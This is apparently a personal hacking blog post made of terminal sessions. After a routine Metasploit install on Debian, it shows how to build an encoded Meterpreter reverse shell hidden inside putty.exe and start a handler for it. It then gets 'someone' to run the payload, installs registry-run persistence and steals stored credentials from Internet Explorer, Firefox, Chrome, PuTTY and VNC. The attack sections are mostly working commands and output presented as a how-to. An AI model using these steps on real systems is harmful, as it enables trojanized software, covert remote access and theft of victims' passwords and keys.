Blog

My weblog, for lack of a better word…
Here you can find stuff about stuff, things about things and basically anything about everything.
Nothing here has a date, since it's mostly snippets of code and how to use certain applications and their options (arguments).

Mostly stuff about hacking though :P

Disclaimer: read the Fineprint


Installing Metasploit on Debian Jessie

ztik@unknownhost:~$ apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting 'xtightvncviewer' instead of 'vncviewer'
build-essential is already the newest version.
zlib1g-dev is already the newest version.
zlib1g-dev set to manually installed.
openjdk-7-jre is already the newest version.
openjdk-7-jre set to manually installed.
libssl-dev is already the newest version.
The following extra packages will be installed:
	<snip>you get the idea here</snip>
Processing triggers for libc-bin (2.19-18+deb8u7) ...
Processing triggers for systemd (215-17+deb8u6) ...
ztik@unknownhost:~$ git clone git://github.com/sstephenson/rbenv.git .rbenv
Cloning into '.rbenv'...
remote: Counting objects: 2595, done.
remote: Total 2595 (delta 0), reused 0 (delta 0), pack-reused 2595
Receiving objects: 100% (2595/2595), 475.80 KiB | 0 bytes/s, done.
Resolving deltas: 100% (1628/1628), done.
Checking connectivity... done.
ztik@unknownhost:~$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
ztik@unknownhost:~$ echo 'eval "$(rbenv init -)"' >> ~/.bashrc
ztik@unknownhost:~$ exec $SHELL 
ztik@unknownhost:~$ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
Cloning into '/home/ztik/.rbenv/plugins/ruby-build'...
remote: Counting objects: 7400, done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 7400 (delta 1), reused 0 (delta 0), pack-reused 7392
Receiving objects: 100% (7400/7400), 1.45 MiB | 1.30 MiB/s, done.
Resolving deltas: 100% (4483/4483), done.
Checking connectivity... done.
ztik@unknownhost:~$ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
ztik@unknownhost:~$ exec $SHELL 
ztik@unknownhost:~$ rbenv install 2.3.3
Downloading ruby-2.3.3.tar.bz2...
-> https://cache.ruby-lang.org/pub/ruby/2.3/ruby-2.3.3.tar.bz2
Installing ruby-2.3.3...
Installed ruby-2.3.3 to /home/ztik/.rbenv/versions/2.3.3
 
ztik@unknownhost:~$ rbenv global 2.3.3
ztik@unknownhost:/opt/metasploit-framework$ ruby -v
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-linux]
ztik@unknownhost:~$ su postgres
postgres@unknownhost:/home/ztik$ createuser -P -S MSF -R -D
Enter password for new role: 
Enter it again: 
postgres@unknownhost:/home/ztik$ createdb -O MSF MSF
postgres@unknownhost:/home/ztik$ exit
exit
ztik@unknownhost:~$ cd /opt
ztik@unknownhost:/opt$ git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 388973, done.
remote: Compressing objects: 100% (105/105), done.
remote: Total 388973 (delta 47), reused 0 (delta 0), pack-reused 388867
Receiving objects: 100% (388973/388973), 288.37 MiB | 5.71 MiB/s, done.
Resolving deltas: 100% (282540/282540), done.
Checking connectivity... done.
Checking out files: 100% (7848/7848), done.
ztik@unknownhost:/opt$ chown -R root /opt/metasploit-framework
ztik@unknownhost:/opt$ cd metasploit-framework
ztik@unknownhost:/opt/metasploit-framework$ gem install bundler
Did you know that maintaining and improving Bundler and RubyGems.org costs more than $25,000 USD every month? Help us keep the gem ecosystem free for everyone by joining the hundreds of companies and individuals who help cover these costs: https://ruby.to/support-bundler
Successfully installed bundler-1.14.4
Parsing documentation for bundler-1.14.4
Done installing documentation for bundler after 9 seconds
1 gem installed
ztik@unknownhost:/opt/metasploit-framework$ bundle install
Fetching gem metadata from https://rubygems.org/.............
Fetching version metadata from https://rubygems.org/...
Fetching dependency metadata from https://rubygems.org/..
Installing rake 12.0.0
Installing i18n 0.8.0
Installing json 1.8.6 with native extensions
Installing minitest 5.10.1
Installing thread_safe 0.3.5
Installing builder 3.2.3
Installing erubis 2.7.0
Installing mini_portile2 2.1.0
Installing rack 1.6.5
Installing arel 6.0.4
Installing public_suffix 2.0.5
Installing ffi 1.9.17 with native extensions
Installing contracts 0.14.0
Installing gherkin 4.0.0
Installing cucumber-wire 0.0.1
Installing diff-lcs 1.3
Installing multi_json 1.12.1
Installing multi_test 0.1.2
Installing rspec-support 3.5.0
Installing thor 0.19.4
Installing bcrypt 3.1.11 with native extensions
Installing bit-struct 0.15.0
Installing mime-types-data 3.2016.0521
Installing coderay 1.1.1
Installing docile 1.1.5
Installing multipart-post 2.0.0
Installing filesize 0.1.1
Installing fivemat 1.3.2
Installing rkelly-remix 0.0.7
Installing metasm 1.0.2
Installing pg 0.19.0 with native extensions
Installing pg_array_parser 0.0.9 with native extensions
Installing rubyntlm 0.6.1
Installing rubyzip 1.2.1
Installing metasploit-payloads 1.2.14
Installing metasploit_payloads-mettle 0.1.7
Installing msgpack 1.0.3 with native extensions
Installing nessus_rest 0.1.6
Installing net-ssh 4.0.1
Installing network_interface 0.0.1 with native extensions
Installing openssl-ccm 1.2.1
Installing openvas-omp 0.0.4
Installing pcaprub 0.12.4 with native extensions
Installing patch_finder 1.0.2
Installing rb-readline 0.5.4
Installing redcarpet 3.4.0 with native extensions
Installing rex-text 0.2.11
Installing rex-core 0.1.7
Installing rex-struct2 0.1.0
Installing rex-java 0.1.3
Installing rex-registry 0.1.1
Installing robots 0.10.1
Installing sqlite3 1.3.13 with native extensions
Installing sshkey 1.9.0
Installing windows_error 0.1.0
Installing method_source 0.8.2
Installing slop 3.6.0
Installing simplecov-html 0.10.0
Installing timecop 0.8.1
Installing yard 0.9.8
Using bundler 1.14.4
Installing tzinfo 1.2.2
Installing nokogiri 1.7.0.1 with native extensions
Installing rack-test 0.6.3
Installing addressable 2.5.0
Installing childprocess 0.5.9
Installing cucumber-core 1.5.0
Installing rspec-expectations 3.5.0
Installing rspec-core 3.5.4
Installing rspec-mocks 3.5.0
Installing mime-types 3.1
Installing faraday 0.11.0
Installing jsobfu 0.4.2
Installing packetfu 1.1.13.pre
Installing rex-arch 0.1.4
Installing rex-mime 0.1.3
Installing rex-ole 0.1.4
Installing rex-random_identifier 0.1.1
Installing rex-zip 0.1.1
Installing rex-rop_builder 0.1.1
Installing rex-socket 0.1.3
Installing pry 0.10.4
Installing simplecov 0.13.0
Installing activesupport 4.2.7.1
Installing tzinfo-data 1.2016.10
Installing loofah 2.0.3
Installing xpath 2.0.0
Installing recog 2.1.4
Installing cucumber 2.4.0
Installing sawyer 0.8.1
Installing rex-bin_tools 0.1.1
Installing rex-encoder 0.1.2
Installing rex-nop 0.1.0
Installing rex-powershell 0.1.69
Installing rex-sslscan 0.1.2
Installing rails-deprecated_sanitizer 1.0.3
Installing activemodel 4.2.7.1
Installing factory_girl 4.8.0
Installing shoulda-matchers 3.1.1
Installing rails-html-sanitizer 1.0.3
Installing capybara 2.12.1
Installing aruba 0.14.2
Installing octokit 4.6.2
Installing rex-exploitation 0.1.10
Installing rails-dom-testing 1.0.8
Installing activerecord 4.2.7.1
Installing actionview 4.2.7.1
Installing arel-helpers 2.3.0
Installing postgres_ext 3.0.0
Installing actionpack 4.2.7.1
Installing railties 4.2.7.1
Installing cucumber-rails 1.4.5
Installing factory_girl_rails 4.8.0
Installing metasploit-concern 2.0.3
Installing metasploit-model 2.0.3
Installing rspec-rails 3.5.2
Installing metasploit_data_models 2.0.14
Installing metasploit-credential 2.0.8
Using metasploit-framework 4.13.25 from source at `.`
Bundle complete! 14 Gemfile dependencies, 119 gems now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
  get cucumber > 2 and this will fail on ruby 1.8.7
 
  gem 'cucumber', '~> 1.3.20'
 
With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
Post-install message from openssl-ccm:
Thanks for installing!
Post-install message from yard:
--------------------------------------------------------------------------------
As of YARD v0.9.2:
 
RubyGems "--document=yri,yard" hooks are now supported. You can auto-configure
YARD to automatically build the yri index for installed gems by typing:
 
    $ yard config --gem-install-yri
 
See `yard config --help` for more information on RubyGems install hooks.
 
You can also add the following to your .gemspec to have YARD document your gem
on install:
 
    spec.metadata["yard.run"] = "yri" # use "yard" to build full HTML docs.
 
--------------------------------------------------------------------------------
ztik@unknownhost:/opt/metasploit-framework$ bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' 
ztik@unknownhost:/opt/metasploit-framework$ ls /usr/local/bin/msf* -al
lrwxrwxrwx 1 root root 36 Feb 19 21:47 /usr/local/bin/msfconsole -> /opt/metasploit-framework/msfconsole
lrwxrwxrwx 1 root root 30 Feb 19 21:47 /usr/local/bin/msfd -> /opt/metasploit-framework/msfd
lrwxrwxrwx 1 root root 32 Feb 19 21:47 /usr/local/bin/msfrpc -> /opt/metasploit-framework/msfrpc
lrwxrwxrwx 1 root root 33 Feb 19 21:47 /usr/local/bin/msfrpcd -> /opt/metasploit-framework/msfrpcd
lrwxrwxrwx 1 root root 35 Feb 19 21:47 /usr/local/bin/msfupdate -> /opt/metasploit-framework/msfupdate
lrwxrwxrwx 1 root root 34 Feb 19 21:47 /usr/local/bin/msfvenom -> /opt/metasploit-framework/msfvenom
ztik@unknownhost:/opt/metasploit-framework$ updatedb
updatedb: can not open a temporary file for `/var/lib/mlocate/mlocate.db'
ztik@unknownhost:/opt/metasploit-framework$ cd config
ztik@unknownhost:/opt/metasploit-framework/config$ cp database.yml.example database.yml
ztik@unknownhost:/opt/metasploit-framework/config$ nano database.yml
 
production: &pgsql
  adapter: postgresql
  database: <insert database created during postgres installation, MSF in this example>
  username: <insert username created during postgres user creation, MSF in this example>
  password: <insert password created during postgres user creation>
  host: localhost
  port: 5432
  pool: 75
  timeout: 1
 
ztik@unknownhost:/opt/metasploit-framework/config$ sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
ztik@unknownhost:/opt/metasploit-framework$ source /etc/profile
ztik@unknownhost:/opt/metasploit-framework$ cd ~
ztik@unknownhost:~$ msfconsole
 
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+
 
 
       =[ metasploit v4.13.25-dev-6470202                 ]
+ -- --=[ 1623 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

Updating Metasploit

ztik@unknownhost:~$ msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
 
[*] Checking for updates via git
[*] Note: Updating from bleeding edge
HEAD is now at 6470202 Bump version of framework to 4.13.25
Already on 'master'
Your branch is up-to-date with 'origin/master'.
Already up-to-date.
[*] Updating gems...
Using rake 12.0.0
Using i18n 0.8.0
Using json 1.8.6
Using minitest 5.10.1
Using thread_safe 0.3.5
Using builder 3.2.3
Using erubis 2.7.0
Using mini_portile2 2.1.0
Using rack 1.6.5
Using arel 6.0.4
Using public_suffix 2.0.5
Using ffi 1.9.17
Using contracts 0.14.0
Using gherkin 4.0.0
Using cucumber-wire 0.0.1
Using diff-lcs 1.3
Using multi_json 1.12.1
Using multi_test 0.1.2
Using rspec-support 3.5.0
Using thor 0.19.4
Using bcrypt 3.1.11
Using bit-struct 0.15.0
Using mime-types-data 3.2016.0521
Using coderay 1.1.1
Using docile 1.1.5
Using multipart-post 2.0.0
Using filesize 0.1.1
Using fivemat 1.3.2
Using rkelly-remix 0.0.7
Using metasm 1.0.2
Using pg 0.19.0
Using pg_array_parser 0.0.9
Using rubyntlm 0.6.1
Using rubyzip 1.2.1
Using metasploit-payloads 1.2.14
Using metasploit_payloads-mettle 0.1.7
Using msgpack 1.0.3
Using nessus_rest 0.1.6
Using net-ssh 4.0.1
Using network_interface 0.0.1
Using openssl-ccm 1.2.1
Using openvas-omp 0.0.4
Using pcaprub 0.12.4
Using patch_finder 1.0.2
Using rb-readline 0.5.4
Using redcarpet 3.4.0
Using rex-text 0.2.11
Using rex-core 0.1.7
Using rex-struct2 0.1.0
Using rex-java 0.1.3
Using rex-registry 0.1.1
Using robots 0.10.1
Using sqlite3 1.3.13
Using sshkey 1.9.0
Using windows_error 0.1.0
Using method_source 0.8.2
Using slop 3.6.0
Using simplecov-html 0.10.0
Using timecop 0.8.1
Using yard 0.9.8
Using bundler 1.14.4
Using tzinfo 1.2.2
Using nokogiri 1.7.0.1
Using rack-test 0.6.3
Using addressable 2.5.0
Using childprocess 0.5.9
Using cucumber-core 1.5.0
Using rspec-expectations 3.5.0
Using rspec-core 3.5.4
Using rspec-mocks 3.5.0
Using mime-types 3.1
Using faraday 0.11.0
Using jsobfu 0.4.2
Using packetfu 1.1.13.pre
Using rex-arch 0.1.4
Using rex-mime 0.1.3
Using rex-ole 0.1.4
Using rex-random_identifier 0.1.1
Using rex-zip 0.1.1
Using rex-rop_builder 0.1.1
Using rex-socket 0.1.3
Using pry 0.10.4
Using simplecov 0.13.0
Using activesupport 4.2.7.1
Using tzinfo-data 1.2016.10
Using loofah 2.0.3
Using xpath 2.0.0
Using recog 2.1.4
Using cucumber 2.4.0
Using sawyer 0.8.1
Using rex-bin_tools 0.1.1
Using rex-encoder 0.1.2
Using rex-nop 0.1.0
Using rex-powershell 0.1.69
Using rex-sslscan 0.1.2
Using rails-deprecated_sanitizer 1.0.3
Using activemodel 4.2.7.1
Using factory_girl 4.8.0
Using shoulda-matchers 3.1.1
Using rails-html-sanitizer 1.0.3
Using capybara 2.12.1
Using aruba 0.14.2
Using octokit 4.6.2
Using rex-exploitation 0.1.10
Using rails-dom-testing 1.0.8
Using activerecord 4.2.7.1
Using actionview 4.2.7.1
Using arel-helpers 2.3.0
Using postgres_ext 3.0.0
Using actionpack 4.2.7.1
Using railties 4.2.7.1
Using cucumber-rails 1.4.5
Using factory_girl_rails 4.8.0
Using metasploit-concern 2.0.3
Using metasploit-model 2.0.3
Using rspec-rails 3.5.2
Using metasploit_data_models 2.0.14
Using metasploit-credential 2.0.8
Using metasploit-framework 4.13.25 from source at `.`
Bundle complete! 14 Gemfile dependencies, 119 gems now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.

Add encoded Meterpreter payload to an executable

ztik@unknownhost:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=31415 -f raw -e x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -x /home/ztik/putty.exe -f exe -o /home/ztik/payload.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai chosen with final size 495
Payload size: 495 bytes
 
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/countdown
x86/countdown succeeded with size 513 (iteration=0)
x86/countdown succeeded with size 531 (iteration=1)
x86/countdown succeeded with size 549 (iteration=2)
x86/countdown succeeded with size 567 (iteration=3)
x86/countdown succeeded with size 585 (iteration=4)
x86/countdown succeeded with size 603 (iteration=5)
x86/countdown chosen with final size 603
Payload size: 603 bytes
 
Found 1 compatible encoders
Attempting to encode payload with 6 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 630 (iteration=0)
x86/shikata_ga_nai succeeded with size 657 (iteration=1)
x86/shikata_ga_nai succeeded with size 684 (iteration=2)
x86/shikata_ga_nai succeeded with size 711 (iteration=3)
x86/shikata_ga_nai succeeded with size 738 (iteration=4)
x86/shikata_ga_nai succeeded with size 765 (iteration=5)
x86/shikata_ga_nai chosen with final size 765
Payload size: 765 bytes
Final size of exe file: 531368 bytes
Saved as: payload.exe
ztik@unknownhost:~$ ls *.exe -al
-rw-r--r-- 1 ztik ztik 531368 Feb 19 22:34 payload.exe
-rw-r--r-- 1 ztik ztik 531368 Feb 29  2016 putty.exe
ztik@unknownhost:~$ chmod +x payload.exe

Starting a handler

ztik@unknownhost:~$ msfconsole
 
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 
 
       =[ metasploit v4.13.25-dev-6470202                 ]
+ -- --=[ 1623 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(handler) > set LPORT 31415
LPORT => 31415
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 10.0.2.15:31415
[*] Starting the payload handler...
msf exploit(handler) > 

Have someone run the payload

msf exploit(handler) > 
[*] Sending stage (957487 bytes) to 10.0.2.13
[*] Meterpreter session 1 opened (10.0.2.15:31415 -> 10.0.2.13:55022) at 2017-02-19 23:05:25 +0100
msf exploit(handler) >

Session list

msf exploit(handler) > sessions -l
 
Active sessions
===============
 
  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  ZTIK-PC\ZTiK @ ZTIK-PC  10.0.2.15:31415 -> 10.0.2.13:55022 (10.0.2.13)
 
msf exploit(handler) >

Change active session

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter >

Place active session in background

meterpreter > background
msf exploit(handler) >

Migrate payload to another proces

 

Get active system profile

meterpreter > getuid
Server username: ZTIK-PC\ZTiK
meterpreter > 

Persistence script

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/persistence_exe
msf exploit(persistence) > show options
 
Module options (exploit/windows/local/persistence):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     10               yes       Delay (in seconds) for persistent payload to keep reconnecting back.
   EXE_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   PATH                       no        Path to write payload (%TEMP% by default).
   REG_NAME                   no        The name to call registry value for persistence on target host (%RAND% by default).
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)
   VBS_NAME                   no        The filename to use for the VBS persistent script on the target host (%RAND% by default).
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows
 
 
msf exploit(persistence) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(persistence) > set LPORT 31415
LPORT => 31415
msf exploit(persistence) > set STARTUP SYSTEM
STARTUP => SYSTEM
 
msf exploit(persistence) > sessions
 
Active sessions
===============
 
  Id  Type                     Information             Connection
  --  ----                     -----------             ----------
  1   meterpreter x86/windows  ZTIK-PC\ZTiK @ ZTIK-PC  10.0.2.15:31415 -> 10.0.2.13:55457 (10.0.2.13)
 
msf exploit(persistence) > set SESSION 1
SESSION => 1
msf exploit(persistence) > run
 
[*] Running persistent module against ZTIK-PC via session ID: 1
[+] Persistent VBS script written on ZTIK-PC to C:\Users\ZTiK\AppData\Local\Temp\tGkkGC.vbs
[*] Installing as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QsaReFmOL
[+] Installed autorun on ZTIK-PC as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QsaReFmOL
[*] Clean up Meterpreter RC file: /home/ztik/.msf4/logs/persistence/ZTIK-PC_20170219.3748/ZTIK-PC_20170219.3748.rc

Steal Internet Explorer stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > wget --referer='http://www.nirsoft.net/utils/internet_explorer_password.html' http://www.nirsoft.net/toolsdownload/iepv.zip
[*] exec: wget --referer='http://www.nirsoft.net/utils/internet_explorer_password.html' http://www.nirsoft.net/toolsdownload/iepv.zip
 
--2017-02-19 23:46:30--  http://www.nirsoft.net/toolsdownload/iepv.zip
Resolving www.nirsoft.net (www.nirsoft.net)... 50.22.232.74
Connecting to www.nirsoft.net (www.nirsoft.net)|50.22.232.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70610 (69K) [application/zip]
Saving to: ‘iepv.zip’
 
iepv.zip                                             100%
[=======================================================================================================================>]  68.96K   229KB/s   in 0.3s   
 
2017-02-19 23:46:30 (229 KB/s) - ‘iepv.zip’ saved [70610/70610]
 
msf exploit(handler) > unzip iepv.zip
[*] exec: unzip iepv.zip
 
Archive:  iepv.zip
  inflating: iepv.exe                
  inflating: iepv.chm                
  inflating: readme.txt              
  inflating: iepv_sites.txt          
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > upload iepv.exe
[*] uploading  : iepv.exe -> iepv.exe
[*] uploaded   : iepv.exe -> iepv.exe
meterpreter > shell
Process 9192 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Program Files\\Putty>>iepv.exe /stext passwd.txt
iepv.exe /stext passwd.txt
 
C:\Program Files\\Putty>exit
meterpreter > download C:\\Program\ Files\\Puttypasswd.txt /root/passwd.txt       (let op de dubbele slash !)
[*] downloading: c:\passwd.txt -> /home/ztik/passwd.txt
[*] downloaded : c:\passwd.txt -> /home/ztik/passwd.txt
meterpreter > rm iepv.exe
meterpreter > rm passwd.txt
meterpreter > background
msf exploit(handler) > cat /home/ztik/passwd.txt
[*] exec: cat /home/ztik/passwd.txt
 
==================================================
Entry Name        : http://nl.facebook.com/
Type              : AutoComplete
Stored In         : Registry
User Name         : myfacebookusername789
Password          : myfacebookpassword987
Password Strength : Medium
==================================================
 
==================================================
Entry Name        : https://login.skype.com/account/login-form
Type              : AutoComplete
Stored In         : Registry
User Name         : myskypeusername678
Password          : myskypepassword876
Password Strength : Strong
==================================================
 
==================================================
Entry Name        : https://www.amazon.com/gp/cart/view.html/ref=ox_huc_proceed_top
Type              : AutoComplete
Stored In         : Registry
User Name         : myamazonusername456
Password          : myamazonpassword654
Password Strength : Strong
==================================================
 
==================================================
Entry Name        : https://www.paypal.com/
Type              : AutoComplete
Stored In         : Registry
User Name         : mypaypalusername123
Password          : mypaypalpassword321
Password Strength : Strong
==================================================
msf exploit(handler) >

Steal Mozilla Firefox stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/multi/gather/firefox_creds
msf post(firefox_creds) > show options
 
Module options (post/multi/gather/firefox_creds):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DECRYPT  false            no        Decrypts passwords without third party tools
   SESSION                   yes       The session to run this module on.
 
msf post(firefox_creds) > set SESSION 1
SESSION => 1
msf post(firefox_creds) > run
 
[*] Checking for Firefox profile in: C:\Users\ZTiK\AppData\Roaming\Mozilla\
 
[*] Profile: C:\Users\ZTiK\AppData\Roaming\Mozilla\Firefox\Profiles\7UBJXq5o.default
[+] Downloaded cert8.db: /home/ztik/.msf4/loot/20170220001444_default_10.0.2.13_ff.7UBJXq5o.cert_429837.bin
[+] Downloaded cookies.sqlite: /home/ztik/.msf4/loot/20170220001445_default_10.0.2.13_ff.7UBJXq5o.cook_266771.bin
[+] Downloaded key3.db: /home/ztik/.msf4/loot/20170220001447_default_10.0.2.13_ff.7UBJXq5o.key3_505789.bin
[+] Downloaded logins.json: /home/ztik/.msf4/loot/20170220001447_default_10.0.2.13_ff.7UBJXq5o.logi_786367.bin
 
[*] Post module execution completed

Steal Google Chrome stored passwords

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > show options
 
Module options (post/windows/gather/enum_chrome):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MIGRATE  false            no        Automatically migrate to explorer.exe
   SESSION                   yes       The session to run this module on.
 
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > run
 
[*] Impersonating token: 6316
[*] Running as user 'ZTIK-PC\ZTiK'...
[*] Extracting data for user 'ZTiK'...
[*] Downloaded Web Data to '/home/ztik/.msf4/loot/20170220000643_default_10.0.2.13_chrome.raw.WebD_072799.txt'
[*] Downloaded Cookies to '/home/ztik/.msf4/loot/20170220000644_default_10.0.2.13_chrome.raw.Cooki_086840.txt'
[*] Downloaded History to '/home/ztik/.msf4/loot/20170220000644_default_10.0.2.13_chrome.raw.Histo_301300.txt'
[*] Downloaded Login Data to '/home/ztik/.msf4/loot/20170220000645_default_10.0.2.13_chrome.raw.Login_251299.txt'
[*] Downloaded Bookmarks to '/home/ztik/.msf4/loot/20170220000646_default_10.0.2.13_chrome.raw.Bookm_360246.txt'
[*] Downloaded Preferences to '/home/ztik/.msf4/loot/20170220000646_default_10.0.2.13_chrome.raw.Prefe_348157.txt'
[*] Post module execution completed
msf post(enum_chrome) >

Steal PuTTY sessions

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/enum_putty_saved_sessions
msf post(enum_putty_saved_sessions) > show options
 
Module options (post/windows/gather/enum_putty_saved_sessions):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(enum_putty_saved_sessions) > set SESSION 1
SESSION => 1
msf post(enum_putty_saved_sessions) > run
 
[*] Looking for saved PuTTY sessions
[*] Found 4 sessions
 
PuTTY Saved Sessions
====================
 
 Name            HostName       UserName  PublicKeyFile  PortNumber  PortForwardings
 ----            --------       --------  -------------  ----------  ---------------
 VPS1            *.*.*.*                                 22       
 VPS3            *.*.*.*                                 22          
 MediaCenter     *.*.*.*        osmc                     22       
 WiFi Pineapple  *.*.*.*                                 22          
 
[*] PuTTY saved sessions list saved to /home/ztik/.msf4/loot/20170220001848_default_10.0.2.13_putty.sessions.c_047572.txt in CSV format & available in notes (use 'notes -t putty.savedsession' to view).
[*] Downloading private keys...
 
[*] Looking for previously stored SSH host key fingerprints
[*] Found 4 stored key fingerprints
[*] Downloading stored key fingerprints...
 
Stored SSH host key fingerprints
================================
 
 SSH Endpoint         Key Type(s)
 ------------         -----------
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 *.*.*.*:22           rsa2
 
[*] PuTTY stored host keys list saved to /home/ztik/.msf4/loot/20170220001849_default_10.0.2.13_putty.storedfing_899849.txt in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).
 
[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed
msf post(enum_putty_saved_sessions) > 

Steal VNC credentials

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/vnc
msf post(vnc) > show options
 
Module options (post/windows/gather/credentials/vnc):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
 
msf post(vnc) > set SESSION 1
SESSION => 1
msf post(vnc) > run
 
[*] Enumerating VNC passwords on ZTIK-PC
[*] Post module execution completed
msf post(vnc) > run
 
